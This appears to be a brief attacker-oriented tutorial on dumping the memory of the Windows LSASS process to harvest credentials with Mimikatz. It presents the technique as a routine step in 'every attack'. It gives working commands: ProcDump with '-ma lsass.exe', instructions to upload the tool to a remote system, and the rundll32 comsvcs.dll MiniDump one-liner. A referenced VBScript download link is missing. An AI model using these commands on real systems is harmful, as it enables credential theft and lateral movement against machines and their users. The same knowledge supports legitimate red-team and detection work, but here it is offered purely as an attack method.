In every attack we need to get the windows credentials, this super important task. We need to target "LSASS.EXE" process and dump the process memory so that we can use it for extracting credentials using Mimikatz.
Here are some of the important methods,
Using ProcDump :
1. Favorite method of dumping is using "procdump.exe". This tool is from Microsoft Pstools
2. Download ProcDump.exe and upload in on remote system
3. Command : "procdump -ma lsass.exe lsass.dmp"
Using VB Script :
Download script from here :
rundll32 Command :
Essentially previous method VBS script is using following command for dumping Lsass.exe process
rundll32 C:\windows\system32\comsvcs.dll, MiniDump 992 C:\Users\Public\lsass.bin full
So in case you do not have VB Script with you still you can fire-up the command and dump LSASS process.